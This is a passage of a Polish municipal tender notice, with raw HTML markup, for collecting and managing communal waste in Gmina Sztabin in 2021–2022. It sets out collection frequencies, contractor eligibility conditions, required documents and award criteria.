nieruchomości następujących frakcji odpadów komunalnych z następującą częstotliwością:Część 1 zamówienia:a)	Odpady zmieszane odbierane będą:	w okresie listopad – marzec: 1 raz w miesiącu,	w okresie kwiecień – październik: 1 raz na dwa tygodnie.b)	Odpady zmieszane z terenu nieruchomości Wspólnoty Mieszkaniowej będą odbierane:	w okresie listopad – marzec: 2 razy w miesiącu,	w okresie kwiecień – październik: 1 raz w tygodniu.c)	Odpady zbierane selektywnie: papier i tektura, szkło, tworzywa sztuczne, opakowania wielomateriałowe oraz odpady opakowaniowe ze szkła, metale odbierane będą:	z gospodarstw domowych – 1 raz w miesiącu,	z terenu Wspólnoty Mieszkaniowej – 2 razy w miesiącu.d)	bioodpady stanowiące odpady komunalne – w okresie listopad - marzec 1 raz w miesiącu, a w okresie od kwietnia do października 1 raz na dwa tygodnie i jeden raz w tygodniu z budynków Wspólnoty Mieszkaniowej,e)	zbierany selektywnie popiół: – dla Wspólnoty Mieszkaniowej co najmniej 2 razy w roku,	w sezonie grzewczym dla gospodarstw domowych tj. od 1 października do 30 kwietnia – 1 raz w miesiącu 	poza sezonem grzewczym dla gospodarstw domowych – jeden raz w lipcu, f)	pozostałe odpady zbierane selektywnie tj.: zużyty sprzęt elektryczny i elektroniczny, baterie, meble i inne odpady wielkogabarytowe, zużyte opony, przeterminowane lekarstwa - jeden raz w roku.Część 2 zamówienia:Odbiór i zagospodarowanie odpadów komunalnych zmieszanych i segregowanych z terenów i obiektów komunalnych zarządzanych przez Gminę Sztabin;a)	odpady zmieszane z budynku Urzędu Gminy w Sztabinie, szkół podstawowych oraz z plaży w Sztabinie – 2 razy w miesiącu.b)	odpady segregowane z budynku Urzędu Gminy w Sztabinie, szkół podstawowych – 2 razy w miesiącu.c)	odpady zmieszane z pojemników ustawionych na placach – 2 razy w miesiącu (dopuszcza się możliwość częstszego odbioru odpadów) d)	odpady zmieszane z pozostałych obiektów – 1 raz w miesiącu </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">90500000-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90511000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90513100-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90512000-9</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2021-01-01</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2022-12-31</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'>2021-01-01 </TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2022-12-31</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada: - wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie Gminy Sztabin, prowadzonego na podstawie art. 9c ust. 1 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach ( tj. Dz.U. z 2020 r. poz. 1439) - aktualne zezwolenie na prowadzenie działalności w zakresie transportu odpadów w zgodnie z przepisami ustawy z dnia 14 grudnia 2012 r. o odpadach (t. j. Dz. U. 2019 r., poz. 701 z po z n. zm.) w zakresie rodzajów odpadów objętych niniejszym postępowaniem lub wpisu do rejestru bazy danych o produktach i opakowaniach oraz o gospodarce odpadami (BDO).</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie stawia szczegółowego warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że: - w okresie ostatnich trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje należycie) co najmniej jedną usługę związaną z przedmiotem zamówienia, a w szczególności polegającą na odbiorze i transporcie odpadów komunalnych w sposób ciągły przez okres 12 miesięcy, o wartości nie mniejszej niż:Część 1 – 200 000,00 złCzęść 2 – 60 000,00 złW przypadku ubiegania się przez Wykonawcę o udzielenie zamówienia na obie części zamówienia, Zamawiający uzna za wystarczające wykazanie zrealizowania jednej usługi lub kilku usług łącznie o wartości nie mniejszej niż 260 000,00 zł- dysponuje następującymi narzędziami i urządzeniami: •	co najmniej 2 pojazdami specjalnymi do odbierania zmieszanych odpadów komunalnych, przystosowanymi do opróżniania pojemników o pojemności od 120 l do 1100 l, •	co najmniej 2 pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych gromadzonych w workach (w tym popiół ) oraz pojemnikach PA-1.1, •	co najmniej jednym pojazdem przystosowanym do odbioru kontenerów z odpadami z dźwigiem hakowym lub bramowym – (dotyczy Części 1 i Części 2).</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">a) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy, b) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, c) zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organ</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1.	zaświadczenie o wpisie do rejestru działalności regulowanej w gminie Sztabin zgodnie z art. 9c ust. 1 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach ( tj. Dz.U. z 2020 r. poz. 1439);2.	aktualne zezwolenie na prowadzenie działalności w zakresie transportu odpadów zgodnie z przepisami ustawy z dnia 14 grudnia 2012 r. o odpadach (t. j. Dz. U. 2019 r., poz. 701 z póżn. zm.) w zakresie rodzajów odpadów objętych niniejszym postępowaniem lub wpisu do rejestru bazy danych o produktach i opakowaniach oraz o gospodarce odpadami (BDO).3.	wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu;Wykaz należy sporządzić według wzoru stanowiącego Załącznik Nr 5 do SIWZ4.	wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych (dotyczy wszystkich trzech części zamówienia ), dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami;Wykaz należy sporządzić według wzoru stanowiącego Załącznik Nr 6 do SIWZ</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Wypełniony i podpisany formularz „Formularz ofertowy”. 2. Oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Wykonawcy, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5, przekazują Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23. Oświadczenie należy sporządzić według wzoru stanowiącego Załącznik Nr 7 do SIWZ. 3. Pełnomocnictwo – (składane w postępowaniu wraz z oświadczeniami składanymi przez Wykonawcę w celu wstępnego potwierdzenia, że nie podlega on wykluczeniu oraz spełnia warunki udziału w postępowaniu) – do podpisania oferty względnie do podpisania innych dokumentów składanych wraz z ofertą o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą, oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza; 4. Zobowiązanie podmiotu na którego zasoby powołuje się Wykonawca (jeżeli dotyczy) – (składane w postępowaniu wraz z oświadczeniami składanymi przez Wykonawcę w celu wstępnego potwierdzenia, że nie podlega on wykluczeniu oraz spełnia warunki udziału w postępowaniu) – oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza według wzoru stanowiącego Załącznik Nr 8 do SIWZ. 5. Pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie – (składane w postępowaniu wraz z oświadczeniami składanymi przez Wykonawcę w celu wstępnego potwierdzenia, że nie podlega on wykluczeniu oraz spełnia warunki udziału w postępowaniu) – oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza. </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin płatności faktury</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span 